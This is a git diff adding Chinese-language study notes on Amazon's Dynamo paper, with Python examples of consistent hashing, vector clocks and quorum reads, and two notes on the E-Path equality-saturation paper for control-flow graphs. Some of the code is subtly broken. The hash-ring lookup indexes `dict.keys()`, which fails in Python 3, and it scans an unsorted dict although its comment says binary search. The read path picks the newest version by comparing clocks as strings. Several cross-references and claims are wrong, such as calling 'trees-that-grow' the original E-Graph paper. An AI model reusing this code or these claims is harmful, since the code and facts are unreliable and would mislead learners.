移除该节点对应的所有虚拟节点 + for i in range(self.num_replicas): + key = self._hash(f"{node_id}:{i}") + self.ring.pop(key, None) + + def get_node(self, key): + """顺时针找到第一个节点""" + if not self.ring: + return None + hash_val = self._hash(key) + # 二分查找顺时针第一个位置 + for ring_key, node_id in self.ring.items(): + if ring_key >= hash_val: + return node_id + # 绕回环的开头 + return self.ring[self.ring.keys()[0]] + + def _hash(self, key): + return int(hashlib.md5(key.encode()).hexdigest(), 16) + + +# 使用示例 +ring = ConsistentHashRing(num_replicas=150) +ring.add_node("node-A") +ring.add_node("node-B") +ring.add_node("node-C") + +# Key "shopping-cart:user-42" 落在哪个节点? +key = "shopping-cart:user-42" +assigned_node = ring.get_node(key) +print(f"Key '{key}' → {assigned_node}") + +# 增加节点时,只有环上一小段 Key 需要迁移 +ring.add_node("node-D") +print(f"增加 node-D 后,Key '{key}' → {ring.get_node(key)}") +``` + +### 3.2 Vector Clock 冲突检测 + +Dynamo 用 Vector Clock 来判断两个写操作是否冲突,并交给应用层解决: + +```python +class VectorClock: + """向量时钟——Dynamo 的冲突检测核心""" + + def __init__(self, node_id): + self.clock = {} # {node_id: sequence_number} + self.node_id = node_id + + def increment(self): + """当前节点写操作计数 +1""" + self.clock[self.node_id] = self.clock.get(self.node_id, 0) + 1 + + def update(self, other_clock): + """合并其他节点的时钟(取每个节点的最大值)""" + for node_id, seq in other_clock.clock.items(): + self.clock[node_id] = max(self.clock.get(node_id, 0), seq) + + def happens_before(self, other): + """self 是否发生在 other 之前(因果关系)""" + # self <= other:self 所有值都不超过 other + all_leq = all( + self.clock.get(nid, 0) <= other.clock.get(nid, 0) + for nid in set(self.clock) | set(other.clock) + ) + # 且不能相等 + return all_leq and self.clock != other.clock + + def is_concurrent(self, other): + """两个时钟是否并发(互不可达 → 冲突)""" + return (not self.happens_before(other) + and not other.happens_before(self) + and self.clock != other.clock) + + def to_dict(self): + return dict(self.clock) + + +# 使用示例:模拟两个节点并发写入同一 Key +vc1 = VectorClock("node-A") +vc1.increment() # {A:1} + +vc2 = VectorClock("node-B") +vc2.increment() # {B:1} + +# 两个节点同时对 "product:12345" 做了不同修改 +print(f"VC1 (node-A): {vc1.to_dict()}") +print(f"VC2 (node-B): {vc2.to_dict()}") +print(f"是否并发: {vc1.is_concurrent(vc2)}") # True → 冲突! +print(f"VC1 < VC2: {vc1.happens_before(vc2)}") # False +print(f"VC2 < VC1: {vc2.happens_before(vc1)}") # False + +# Dynamo 的策略:保留两个版本,交给应用层决定怎么合并 +# 应用可以是:最后写入者赢(LWW)、业务逻辑合并、或者手动修复 +``` + +### 3.3 读写操作的 Quorum 逻辑 + +```python +class DynamoStore: + """简化版 Dynamo 读写逻辑,展示 N/R/W 机制""" + + def __init__(self, n=3, r=2, w=2): + self.n = n # 复制份数 + self.r = r # 读确认数 + self.w = w # 写确认数 + # 模拟副本存储:{key: [{data, vector_clock}, ...]} + self.replicas = {} + + def write(self, key, value, vector_clock): + """写入:至少 W 个副本确认才返回""" + nodes = [f"replica-{i}" for i in range(self.n)] + successful = 0 + for node in nodes: + # 模拟写入(真实场景是网络 RPC) + if key not in self.replicas: + self.replicas[key] = [] + self.replicas[key].append({ + "data": value, + "clock": vector_clock.to_dict() + }) + successful += 1 + if successful >= self.w: + break # W 个已够,提前返回 + + if successful >= self.w: + return True, f"写入成功,{successful}/{self.n} 副本确认" + return False, f"写入失败,仅 {successful}/{self.w} 副本确认" + + def read(self, key): + """读取:至少 R 个副本响应,返回最新版本""" + if key not in self.replicas: + return None, "Key 不存在" + + # 从 N 个副本中取 R 个 + responses = self.replicas[key][:self.r] + if len(responses) < self.r: + return None, f"副本不足,需要 {self.r} 个,只有 {len(responses)} 个" + + # 找最新版本(基于 Vector Clock) + latest = max(responses, key=lambda x: str(x["clock"])) + return latest["data"], f"读取成功,{len(responses)}/{self.n} 副本响应" + + +# 使用示例 +store = DynamoStore(n=3, r=2, w=2) +vc = VectorClock("node-1") +vc.increment() + +# 写入购物车数据 +ok, msg = store.write("cart:user-1001", {"items": ["book", "pen"]}, vc) +print(ok, msg) + +# 读取购物车数据 +data, msg = store.read("cart:user-1001") +print(msg, "→", data) +``` + +--- + +## 4 Dynamo 的关键设计选择 + +### 4.1 为什么放弃 ACID? + +ACID 中的 **C(一致性)** 和 **A(可用性)** 在分布式系统中存在根本矛盾——这就是著名的 CAP 定理。 + +Dynamo 选择了 AP(可用 + 分区容忍),放弃了强一致性: +- **ACID 数据库**:数据丢了不可恢复 → 但宕机期间无法服务 +- **Dynamo**:允许短暂不一致 → 但永远可读可写 + +对于购物车、会话管理这类业务,用户看到旧数据远比看到"系统忙"要好。 + +### 4.2 应用辅助冲突解决(Application-Assisted Conflict Resolution) + +这是 Dynamo 最具创新性的设计之一。它不自己做"最后写入者赢"(LWW)的默认决策,而是: + +1. 发现冲突 → 返回所有冲突版本给客户端 +2. 客户端的应用代码决定怎么合并(比如购物车合并两个版本的商品列表) + +这把"怎么解决冲突"的决定权交给了最懂业务的应用层。 + +### 4.3 异步复制与反冲突(Anti-Entropy) + +后台会有一个异步的反冲突协议,定期在全量副本之间同步数据,最终让所有副本达成一致。 +这个过程是"背对背"运行的——不阻塞任何读写操作。 + +--- + +## 5 实际效果 + +论文中的数据很有说服力: + +- **Shopping Cart Service**:一天处理 300 万次结账请求 +- **Session 管理**:同时维护数十万个活跃会话 +- **高峰负载**:假日购物季(Black Friday 等)期间零停机 +- **延迟**:99.9 百分位延迟在毫秒级 + +--- + +## 6 对后续系统的影响 + +Dynamo 的设计直接催生了许多后来著名的系统: + +| 系统 | 受 Dynamo 影响的方面 | +|------|---------------------| +| **Cassandra** | 将 Dynamo 与 Bigtable 的理念结合 | +| **Riak** | 几乎直接基于 Dynamo 架构 | +| **Amazon S3** | 同样运行在 Dynamo 基础设施之上 | +| **Azure Cosmos DB** | 提供可调一致性的 KV 存储 | +| **DynamoDB** | 名称即来自此论文 | + +Cassandra 甚至有个外号叫 "Dynamo + Bigtable"——取了 Dynamo 的可用性设计和 Bigtable 的列族存储设计。 + +--- + +## 7 总结 + +Dynamo 的核心贡献不在于发明了什么新技术,而在于**巧妙地组合了已有技术**: + +- 一致性哈希 → 数据分片 +- Gossip 协议 → 去中心化故障检测 +- Vector Clock → 冲突检测 +- Quorum 机制 → 可调一致性与可用性的权衡 +- 异步反冲突 → 最终一致性保证 + +这五个零件拼在一起,造就了一个"永远在线"的键值存储。 + +对于一个零基础的学习者来说,Dynamo 最值得记住的一句话是: + +> **在分布式系统中,没有"完美一致"和"永远可用"同时存在的魔法。Dynamo 做了一个诚实的选择:告诉开发者"数据可能旧几秒",换来的是"系统永远可用"。** + +--- + +## 8 思考题 + +1. 如果 R + W > N 保证强一致性,R + W ≤ N 可能读到旧数据,那你认为 R=1, W=1, N=3 的设定适合什么场景? +2. Vector Clock 能检测并发冲突,但如果冲突太多(比如 10 个节点同时写),应用层要处理多少种合并策略? +3. Dynamo 没有中心协调节点,如果某个节点长时间离线又突然上线,Gossip 协议怎么处理这个"脑裂"问题? + +(这些问题没有唯一正确答案,带着它们去重新读论文的原文,会有不同的体会。) diff --git a/src/content/docs/papers/e-path-egraph.md b/src/content/docs/papers/e-path-egraph.md new file mode 100644 index 000000000..52b912f83 --- /dev/null +++ b/src/content/docs/papers/e-path-egraph.md @@ -0,0 +1,328 @@ +--- +title: E-Path — 控制流图上的等价饱和 +来源: https://arxiv.org/abs/2605.28694 +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +## 从日常类比开始:装修队 vs 平行宇宙样板间 + +想象你要装修一套老房子(**编译器要优化一段带循环的程序**)。 + +**传统 CFG 优化器**像一支**边干边砸墙的装修队**:先把客厅墙敲掉做开放式厨房(LICM 把常量提到循环外),原来的布局图纸就扔了;下一步想做「把两间小卧室合并」时,已经看不到「没敲墙之前」长什么样。而且**施工顺序**极其重要——先刷漆再铺地板,和先铺地板再刷漆,最后效果可能天差地别。这就是编译器里臭名昭著的 **phase-ordering problem(阶段排序问题)**。 + +**等价饱和(Equality Saturation)** 像**同时保留多套平行宇宙样板间**:原版、提常量版、融合分支版……都挂在同一张「等价关系网」上,最后按预算(成本模型)挑一套最划算的,而不是施工中途把别的方案销毁。 + +过去这类技术(**E-Graph / egg**)擅长在**表达式树**上做代数化简——相当于只装修**家具摆放**,对**户型结构(控制流)** 往往要先强行改成树状或结构化 IR,才能下手。 + +**E-Path**(Guillermo Garcia,2026 年 5 月,[arXiv:2605.28694](https://arxiv.org/abs/2605.28694))提出:能不能**直接在 CFG 上**做等价饱和,把**基本块指令序列**当作等价单元,而不是单个表达式?论文在 Rust 编译器后端 **Crabstar** 上做了原型,IR 是受限的 **ANF(A-Normal Form)CFG**——每个基本块「一条指令 + 一个控制流终结符」,但作者强调模型本身可推广到其他 IR。 + +一句话:**E-Path = 在控制流图上做「只增不改」的等价饱和,用 E-Sequence 存多套等价 CFG 片段,最后用符号成本挑赢家。** + +--- + +## 是什么 + +| 项目 | 内容 | +|------|------| +| 论文 | E-Path: Equality Saturation for Control-Flow Graphs | +| 作者 | Guillermo Garcia | +| 原型 | Crabstar 编译器后端(Rust) | +| 核心数据结构 | **E-Path** — 单调增长的等价 E-Sequence 集合 | +| 基本单元 | **E-Sequence** — 从 CFG 导出的基本块线性序列(可编码循环、分支等区域) | +| 与 E-Graph 的区别 | 等价类挂在**指令序列**上,而非表达式 e-class | + +--- + +## 为什么重要 + +### 1. 阶段排序是真实痛点 + +LLVM、GCC 的 pass 流水线是**启发式排期**:LICM 在 GVN 前还是后?不同顺序可能得到不同机器码。E-Path 把「探索多种 CFG 组织」变成**在同一搜索空间里并行保留**,提取阶段再全局比较。 + +### 2. 经典优化可以写成「单调重写」 + +论文以 **LICM(循环不变量外提)** 为例:传统实现**原地改写** CFG;E-Path 则**新增**一条等价 E-Sequence,原版仍留在集合 \(P\) 里。形式化地: + +\[ +P_1 \in P \quad \text{其中 } P_1 \text{ 由 } P_0 \text{ 经 LICM 得到} +\] + +\(P_0\) 与 \(P_1\) **同时有效**,提取器稍后决定用谁。 + +### 3. 补上了「CFG 原生」等价饱和的空白 + +| 路线 | 做法 | 局限 | +|------|------|------| +| **egg / E-Graph** | 表达式级 e-class + rewrite | 任意 CFG 常需先规范化 | +| **RVSDG** | 嵌套区域 + 显式依赖 | 仍要把任意控制流规范化 | +| **传统 SSA 编译器** | 直接改 CFG | 破坏性、顺序敏感 | +| **E-Path** | 在 CFG 嵌入的指令序列上饱和 | 原型仅支持可约循环等(见局限) | + +--- + +## 核心概念 + +### 1. 控制流图(CFG) + +\(G = (V, E)\):\(V\) 为基本块集合,\(E\) 为有向控制边。在 Crabstar 受限 IR 中,每个块 \(b \in V\) 含**单条指令** + **参数化终结符**(分支、回边等)。 + +### 2. E-Sequence(等价序列) + +\[ +S = [b_1, b_2, \ldots, b_n], \quad b_i \in V +\] + +表面是**线性基本块列表**,但通过终结符语义可表示**更高层控制结构**(条件分支引用后继区域、合并块界定序列边界),不必把每个分支局部块都枚举进序列。 + +**日常类比**:E-Sequence 像「户型说明书里的功能分区清单」——列的是客厅、主卧、厨房顺序,但说明书里用脚注标出「此处可开推拉门连阳台」,不必把每种门洞展开成独立房间。 + +### 3. E-Path(单调等价集) + +\[ +P = \{S_1, S_2, \ldots, S_n\} +\] + +重写规则 \(r\) 产生新序列: + +\[ +S_i \xrightarrow{r} S_j \Rightarrow S_j \text{ 插入 } P +\] + +**关键不变量:单调性**——已有序列**永不修改**,只**追加**。语义等价**不由 E-Path 内部证明**,而依赖**外部已验证的重写规则**(与 egg 相同哲学:正确性在规则,不在数据结构)。 + +### 4. LICM 作为重写规则 + +对含循环的 E-Sequence,流水线三步: + +1. **环检测** — 在序列上识别对应 CFG 循环的区域 +2. **不变量判定** — 块的操作数与副作用是否依赖环内被修改的值 +3. **序列重构** — 构造新序列:不变块放到 **preheader**,环内只留变块 + +非正式规则: + +\[ +\text{loop}(I,\, B_{\text{inv}} \cup B_{\text{var}}) +\;\rightarrow\; +B_{\text{inv}};\, \text{loop}(I,\, B_{\text{var}}) +\] + +**不替换**原序列,只**加入**结构不同的等价序列。 + +### 5. 符号成本提取(Extraction) + +多候选并存时,用**符号成本**选最优: + +- 循环成本:\(C = N \cdot M\)(\(N\) 为符号迭代次数,\(M\) 为循环体代价) +- 序列总成本:块代价求和 + 循环区域缩放 + +\[ +S^* = \arg\min_{S \in P} C(S) +\] + +### 6. 两种模式匹配 + +| 模式 | 作用 | +|------|------| +| **表达式级** | ANF 使数据依赖显式,可像 E-Graph 一样匹配计算子图 | +| **控制流级** | 在 CFG 拓扑上匹配:无环指令序列、**可约**循环区域 | + +### 7. 工程权衡:增长与去重 + +单调性意味着 E-Sequence 数量可能**无界增长**。实现用 **hash consing + 结构哈希去重**;饱和定义为**不动点**——不再有新序列产生。 + +--- + +## 代码示例 1:论文中的 LICM 运行例子 + +下面用接近论文 IR 的伪代码展示**传统破坏性 LICM** vs **E-Path 保留双版本**。 + +**优化前** — 循环头每次迭代都执行 `iconst 42`(与归纳变量 `i` 无关): + +```text +loop_header(i): + c = iconst 42 ; 循环不变 + one = iconst 1 + next_i = add i, one + loop_back(next_i) +``` + +**经典编译器 LICM 之后** — 原 CFG **被覆盖**,再也拿不到「未外提」版本: + +```text +preheader: + c = iconst 42 + +loop_header(i): + one = iconst 1 + next_i = add i, one + loop_back(next_i) +``` + +**E-Path 视角** — 集合 \(P\) 同时包含两条 E-Sequence: + +```text +; S0 — 原始序列(仍保留) +S0 = [ loop_header: iconst42 → iconst1 → add → loop_back ] + +; S1 — LICM 重写新增(不删除 S0) +S1 = [ preheader: iconst42 , + loop_header: iconst1 → add → loop_back ] +``` + +提取器若发现外层循环迭代次数 \(N\) 很大,会倾向 \(S_1\)(每迭代少一条 `iconst`);若 \(N\) 符号未知但 preheader 插入有额外开销,也可能保留 \(S_0\)。**决策推迟到全局成本比较**,而非 LICM pass 当场拍板。 + +--- + +## 代码示例 2:用 Rust 风格伪代码理解「单调插入」 + +这不是 Crabstar 源码,而是帮助理解 API 形状的**教学伪代码**: + +```rust +/// E-Path:单调等价集(只 insert,不 mutate 已有 S) +struct EPath { + sequences: HashMap, // hash cons 去重 +} + +struct ESequence { + blocks: Vec, + // 终结符编码分支/回边,线性列表可指代结构化区域 +} + +/// 重写规则:LICM — 返回新序列,旧序列仍在 path 里 +fn licm_rewrite(path: &mut EPath, s: &ESequence, loop_region: LoopRegion) -> Option { + let (invariant, variable) = partition_blocks(&s.blocks, &loop_region)?; + if invariant.is_empty() { + return None; + } + let mut new_blocks = Vec::new(); + new_blocks.extend(build_preheader(&invariant)); + new_blocks.extend(rebuild_loop_header(&variable, &loop_region)); + let s_new = ESequence { blocks: new_blocks }; + // 结构哈希相同则跳过;否则插入 P(永不修改 s) + path.insert_monotonic(s_new) +} + +/// 饱和:反复应用规则直到不动点 +fn saturate(path: &mut EPath, rules: &[RewriteRule], seed: ESequence) { + path.insert_monotonic(seed); + loop { + let mut changed = false; + for s in path.sequences.values().cloned().collect::>() { + for rule in rules { + if let Some(id) = rule.apply(path, &s) { + changed |= path.contains(id); + } + } + } + if !changed { break; } + } +} + +/// 提取:符号成本最小化 +fn extract(path: &EPath, cost_model: &SymbolicCost) -> ESequence { + path.sequences + .values() + .min_by_key(|s| cost_model.evaluate(s)) + .cloned() + .expect("non-empty E-Path") +} +``` + +要点: + +- `insert_monotonic` 体现**只增不改** +- `saturate` 外层对**当前所有** E-Sequence 试规则 — 与 egg 的「对 e-class 反复 rewrite」类似,但单位是 **CFG 片段** +- `extract` 在**多套完整控制流组织**之间选,而非局部 peephole + +--- + +## 与 Equality Saturation / egg 的对比 + +```text +传统 Equality Saturation (egg): + 程序片段 → E-Graph (e-nodes / e-classes) + 重写:代数规则、表达式等价 + 控制流:常借助 CFG skeleton 外挂,或先结构化 + +E-Path: + 程序片段 → CFG 上的 E-Sequence + 重写:LICM 等 CFG 变换 = 序列级规则 + 控制流:一等公民,不必先压成树 +``` + +若你读过 [[ssa]] 笔记:SSA 让**数据流**清晰;E-Path 则在**控制流 + 指令序列**层面做**多套等价布局的联合搜索**,两者可共存于同一后端 pipeline。 + +--- + +## 架构与实现要点 + +1. **IR 约束(原型)**:ANF CFG,每块单指令 + 终结符 — 简化匹配与规则构造,**非** E-Path 理论必需。 +2. **正确性边界**:规则需外部证明语义保持;E-Path **不**内建全程序验证器。 +3. **终止性**:依赖规则系统不动点 + 去重;复杂规则集可能不终止(与一般 EqSat 相同风险)。 +4. **并行前景**(论文 Future Work):各 E-Sequence 可并行匹配/重写,同步点仅为等价集插入 — 适合探索大搜索空间。 + +--- + +## 当前局限(论文第 10 节) + +| 局限 | 说明 | +|------|------| +| 控制流形状 | 仅**可约**循环;无条件分支、跳转表、不可约循环尚未支持 | +| 内存与副作用 | 未建模别名、内存效应、推测执行 | +| 语义证明 | 假定重写规则正确,无内部等价证明 | +| 规模 | 单调集增长需 hash cons;激进规则下空间仍可能爆炸 | + +未来计划:分支分布、循环交换/分裂/融合、部分展开、向量化,以及常量传播、DCE、CSE 等**同样写成单调重写**。 + +--- + +## 相关工作速览 + +- **Tate et al. 2009 / egg (POPL 2021)**:表达式级等价饱和的奠基与工业级实现。 +- **RVSDG (Reissmann et al. 2020)**:用嵌套区域弱化显式 CFG,但仍需规范化。 +- **Cranelift / Julia IR 的 CFG skeleton**:控制流语句与 e-graph 分离存储 — 与 E-Path「序列即等价单元」形成对照。 +- **eqsat MLIR dialect** 等:把 e-graph **嵌入** IR;E-Path 则强调 **CFG 原生序列** 而非外挂表达式图。 + +--- + +## 学习路径建议 + +1. 先理解 **phase-ordering** 与 **destructive CFG pass**(可读 [[ssa]] 与传统 LICM 资料)。 +2. 读 **egg** 教程,建立 e-graph / rewrite / extract 心智模型。 +3. 用本文 **示例 1** 手画 \(P_0, P_1\) 两套序列,体会「为何不删旧版」。 +4. 若做编译器后端:思考你的 IR 能否切成「单指令基本块 + 显式终结符」以利匹配。 +5. 跟踪 Crabstar / E-Path 开源进展(论文称 Rust 原型已存在)。 + +--- + +## 自测题 + +1. E-Path 的「单调性」解决了传统优化器的什么痛点? +2. E-Sequence 与 E-Graph 的 e-class 在「等价粒度」上有何不同? +3. 为何 LICM 在 E-Path 里是「加新序列」而不是「改原序列」? +4. 提取阶段 \(S^* = \arg\min C(S)\) 与传统 pass 链的决策点有何区别? +5. 论文认为 E-Path 不适合立即替代 egg 的场景是什么? + +
+参考答案(先自己想) + +1. 避免破坏性改写导致**无法回溯**其他优化路径,缓解 **pass 顺序敏感**。 +2. e-class 合并**表达式**;E-Sequence 合并**基本块指令序列(含控制结构编码)**。 +3. 保留多版本才能在提取时**全局比较成本**;原地改写会丢失未外提布局。 +4. 传统 pass **每步局部提交**;E-Path **延迟提交**到饱和后一次性选全局最优 CFG 变体。 +5. 纯代数、无控制流改写的表达式优化仍更适合 **E-Graph**;E-Path 针对 **CFG 级**变换。 + +
+ +--- + +## 参考 + +- Guillermo Garcia, *E-Path: Equality Saturation for Control-Flow Graphs*, arXiv:2605.28694, 2026. [https://arxiv.org/abs/2605.28694](https://arxiv.org/abs/2605.28694) +- Ross Tate et al., *Equality Saturation: A New Approach to Optimization*, POPL 2009. +- Max Willsey et al., *egg: Fast and Extensible Equality Saturation*, POPL 2021. +- Ron Cytron et al., *Efficiently Computing SSA…*, TOPLAS 1991 — 见本站 [[ssa]]。 +- Nico Reissmann et al., *RVSDG: An Intermediate Representation for Optimizing Compilers*, TECS 2020. diff --git a/src/content/docs/papers/e-path-equality-saturation-for-control-flow-graphs-arxiv-2605-28694.md b/src/content/docs/papers/e-path-equality-saturation-for-control-flow-graphs-arxiv-2605-28694.md new file mode 100644 index 000000000..1e6c08e8d --- /dev/null +++ b/src/content/docs/papers/e-path-equality-saturation-for-control-flow-graphs-arxiv-2605-28694.md @@ -0,0 +1,290 @@ +--- +title: E-Path Equality Saturation for Control-Flow Graphs — 把"改写程序"变成"同时保留所有可能" +来源: https://arxiv.org/abs/2605.28694 +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +## 是什么 + +**E-Path** 是一种新的数据结构,让编译器能在**控制流图(CFG)**上直接做"平等饱和"(equality saturation)优化。 + +日常类比:传统编译器优化像一个厨师炒菜——翻一次锅就把之前的版本倒掉了,只能按固定顺序加盐、翻炒、出锅。E-Path 像一个**同时保留所有烹饪版本的冰箱**:每次改写都产生一个新版本,原版本不动,最后再从所有版本中选最好的那个端出去。 + +这篇 4 页的短文(Guillermo Garcia, 2026-05-27)的核心贡献只有一句话: + +> 把"相等类"的基本单位从**单个表达式**提升到**指令序列(instruction sequences)**,从而直接在控制流图上做非破坏性优化。 + +## 为什么重要 + +不理解 E-Path,很多现代编译器优化的困境就没法解释: + +- 为什么 GCC / LLVM 的优化要分成几十遍 pass,每遍都改一遍中间表示? +- 为什么"pass 的顺序"会影响最终生成的代码质量(phase-ordering problem)? +- 为什么 E-Graph(如 egg 库)能做表达式级的最优选择,却搞不定循环优化? +- 为什么 RVSDG 要先把控制流"规范化"成嵌套区域结构才能优化? + +E-Path 尝试用一套统一的数据结构同时回答这些问题。 + +## 前置知识 + +在看 E-Path 之前,需要理解三个概念: + +### 1. 控制流图(CFG) + +程序可以画成一堆方块(基本块)加箭头(跳转)。每个方块里是一条或多条指令,箭头表示"执行完这个方块后接下来去哪"。 + +``` + ┌─────────┐ + │ block A │ i = 0 + └────┬─────┘ + ▼ + ┌─────────┐ + │ block B │ i = i + 1 + └────┬─────┘ + ▼ + ┌─────────┐ + │ block C │ if i < 10 goto A + └─────────┘ +``` + +这就是一个最简单的循环。 + +### 2. 静态单赋值形式(SSA) + +每条变量只被赋值一次。`i = 0` 和 `i = i + 1` 中的 `i` 其实是不同的 SSA 变量(`i_0`、`i_1`)。这让数据依赖追踪变得简单。 + +### 3. 平等饱和(Equality Saturation) + +传统优化:应用一个 rewrite → 替换原代码 → 继续下一个 pass。 + +平等饱和:应用一个 rewrite → **产生新版本,旧版本保留** → 继续试更多 rewrite → 最后选最优。 + +核心数据结构叫 **E-Graph**:把所有等价表达式共享在一个图里。egg 库就是最著名的实现。 + +## 核心概念 + +### E-Sequence:一条"指令链" + +E-Path 的基本单位不是单个表达式,而是一个 **E-Sequence**: + +``` +S = [b₁, b₂, ..., bₙ] +``` + +每个 `bᵢ` 是一个基本块。E-Sequence 看起来是线性的,但实际上它隐式编码了分支结构——通过终结符(terminator)语义来引用后继区域。 + +### E-Path:所有等价序列的集合 + +``` +P = {S₁, S₂, ..., Sₙ} +``` + +每一次 rewrite 规则应用,都会往集合里**插入**一个新序列,**不删除**旧序列。这就是"单调性"(monotonic)的含义。 + +### 与 E-Graph 的关键区别 + +| | E-Graph | E-Path | +|---|---|---| +| 等价单位 | 单个表达式 | 指令序列(CFG 片段) | +| 数据结构 | 共享等价类的有向图 | 线性序列的持久化集合 | +| 擅长领域 | 代数变换(常量折叠、公共子表达式) | 控制流变换(循环不变量外提、循环展开) | +| 是否需要规范化 | 需要树/DAG 形式 | 直接在 CFG 上操作 | + +## 代码示例 + +### 示例 1:循环不变量外提(LICM) + +原始代码(循环体内有一个不变量): + +``` +loop_header(i): + c = iconst 42 // 不变量:42 不依赖循环状态 + one = iconst 1 + next_i = add i, one + loop_back(next_i) +``` + +`iconst 42` 是**循环不变量**——它不依赖循环携带的状态。传统 LICM pass 会把这段代码**原地改写**为: + +``` +// 循环外(preheader) +c = iconst 42 + +loop_header(i): + one = iconst 1 + next_i = add i, one + loop_back(next_i) +``` + +E-Path 的做法不同:它**不覆盖**原代码,而是同时保留两个版本: + +``` +P = { + S₀: [loop_header(c=iconst42; one=iconst1; next=add; back)] // 原版 + S₁: [preheader(c=iconst42); loop_header(one=iconst1; next=add; back)] // LICM 后 +} +``` + +后续如果有其他 rewrite 作用于 S₀ 或 S₁,各自独立发展。最终提取时,成本函数会选择 S₁(循环体更小、跑得更快)。 + +### 示例 2:常量传播 + 死代码消除 + +考虑这段代码: + +``` +x = 5 +y = x + 3 // y = 8 +z = y * 0 // z = 0 +print(z) +``` + +经过一系列 rewrite 后,E-Path 中可能积累这样的等价序列集合: + +``` +P = { + S₀: [x=5; y=x+3; z=y*0; print(z)], // 原始 + S₁: [x=5; y=8; z=y*0; print(z)], // 常量传播 y + S₂: [x=5; y=8; z=0; print(z)], // 常量传播 z + S₃: [print(0)], // 死代码消除 x, y, z +} +``` + +每个 Sᵢ 都是有效的程序变体。提取阶段用成本模型选出 S₃(只有 1 条指令)。 + +关键:**S₀ 始终存在**。如果后续某个 rewrite 发现 S₀ 的某种变体更好,它不会被 S₃"覆盖"掉。 + +## E-Path 的工作流程 + +``` +原始 CFG + │ + ▼ +构建初始 E-Sequence S₀ + │ + ▼ +┌──────────────────────────────┐ +│ 重复应用 rewrite 规则 │ +│ │ +│ 规则1: LICM → 新增 S₁ │ +│ 规则2: 常量传播 → 新增 S₂ │ +│ 规则3: 死代码消除 → 新增 S₃ │ +│ ... │ +│ 直到不动点(无新序列产生) │ +└──────────────────────────────┘ + │ + ▼ +成本评估:C(S) = N × M(迭代次数 × 循环体代价) + │ + ▼ +提取 argmin C(S) → 最优版本 +``` + +## 实践细节 + +### 基于 ANF 的 CFG + +当前原型实现在一个受限的 A-Normal Form (ANF) CFG 上,来自 Crabstar 编译器后端。在这个 IR 中,每个基本块只包含**一条指令**后跟一个参数化的控制流终结符。 + +这不是 E-Path 模型本身的要求,而是原型实现的简化手段。 + +### 模式匹配 + +E-Path 支持两种匹配模式: + +1. **表达式级匹配**:利用 ANF 中显式的数据依赖,像传统 E-Graph 那样做结构匹配 +2. **控制流匹配**:在 CFG 拓扑上做模式匹配,目前支持无环指令序列和可归约循环区域 + +### 终止与去重 + +因为单调增长,E-Path 理论上会无限膨胀。解决方式: + +- **Hash consing**:用结构哈希去重,相同序列只存一份 +- **不动点定义终止**:当一轮 rewrite 不再产生新序列时停止 + +### 成本模型 + +循环代价建模为: + +``` +C = N × M +``` + +N = 符号迭代次数,M = 循环体的聚合代价。序列间通过求和组合,循环区域乘以迭代次数。提取时选出最小成本的序列。 + +## 当前局限 + +1. **只支持可归约控制流**:不可归约循环(如 `goto` 造成的交叉跳转)还不支持 +2. **没有别名/内存模型**:不涉及指针别名分析、内存效应或推测执行 +3. **等价性依赖外部证明**:rewrite 规则的正确性由外部保证,E-Path 内部不做语义验证 +4. **原型阶段**:Rust 实现,仅作为 Crabstar 后端的原型验证 + +## 未来方向 + +论文列出的计划包括: + +- 条件分支、跳转表、不可归约循环的模式匹配 +- 循环融合/分裂/交换、部分展开、向量化 +- 常量折叠、常量传播、死代码消除、公共子表达式消除 +- 并行化:每个 E-Sequence 独立,rewrite 和成本提取都可以并行运行 + +## 踩过的坑 + +1. **序列爆炸风险**:即使有 hash consing 去重,rewrite 规则太多时等价集合仍然可能很大。需要聪明的 pruning 策略。 + +2. **成本模型不够精确**:`C = N × M` 是个简化模型。真实硬件上,缓存命中率、分支预测、流水线填充等因素都影响性能,但很难用简单公式表达。 + +3. **ANF 限制匹配能力**:每个基本块一条指令的约束简化了结构匹配,但也意味着复杂的块级模式需要拆成多条 E-Sequence 来匹配。 + +4. **不动点可能很远**:rewrite 规则之间可能互相激发——一个 rewrite 产生的新序列又触发了另一个 rewrite。需要设置最大迭代次数或使用预算控制。 + +## 适用 vs 不适用场景 + +**适用**: + +- 控制流复杂的优化(循环优化、分支优化) +- 多种优化策略可能产生不同最优解的场景 +- 需要避免 pass-ordering 问题的编译器架构 + +**不适用**: + +- 纯表达式级优化(E-Graph 更成熟、更高效) +- 需要精确内存/别名分析的优化 +- 资源极度受限的环境(E-Path 的持久化集合占用更大) + +## 历史脉络 + +- **1991** — Cytron 等人提出 SSA 形式,成为编译器标准 IR +- **2009** — Tate 等人提出 Equality Saturation,E-Graph 诞生 +- **2021** — Willsey 等人发布 egg 库,E-Graph 工程化落地 +- **2020** — Reissmann 等人提出 RVSDG,尝试消除显式控制流 +- **2026** — Garcia 提出 E-Path,把平等饱和扩展到 CFG 层面 + +## 学到什么 + +1. **平等饱和不只是表达式的事**——把等价类的基本单位从"表达式"提升到"指令序列",就能直接处理控制流优化 +2. **非破坏性 = 更多探索空间**——每次 rewrite 都保留旧版本,意味着后来的优化不会"破坏"之前发现的优化机会 +3. **单调性带来并行潜力**——每个 E-Sequence 独立,天然适合并行 rewrite 和成本评估 +4. **成本提取是关键**——保留所有等价变体没有意义,必须有好的成本模型来选出最优 +5. **原型 ≠ 生产**——当前实现限制很多(可归约 CFG、无内存模型),但思想已经清晰 + +## 延伸阅读 + +- 论文原文:[arXiv:2605.28694](https://arxiv.org/abs/2605.28694)(4 页) +- 前驱:[[pypy-tracing-jit]] — PyPy 的 meta-tracing JIT 也是"非破坏性"思想的体现 +- 对照:[[vellvm]] — LLVM 的传统破坏性优化管道,与 E-Path 形成鲜明对比 +- 相关:[[trees-that-grow]] — E-Graph 的原始论文(Tate et al. 2009) +- 相关:[[graalvm-truffle]] — GraalVM 用 partial evaluation 做类似的事情 + +## 关联 + +- [[vellvm]] —— LLVM 的破坏性优化,与 E-Path 的非破坏性形成对照 +- [[pypy-tracing-jit]] —— meta-tracing 也是"保留多种执行路径"的思想 +- [[graalvm-truffle]] —— partial evaluation 路线,与 E-Path 互补 +- [[trees-that-grow]] —— E-Graph 的原始论文,平等饱和的起点 + +## 反向链接 + + diff --git a/src/content/docs/papers/eagle.md b/src/content/docs/papers/eagle.md index 27848d510..7eac8bb2b 100644 --- a/src/content/docs/papers/eagle.md +++ b/src/content/docs/papers/eagle.md @@ -154,5 +154,6 @@ LLaMA2-Chat 70B + 单 GPU 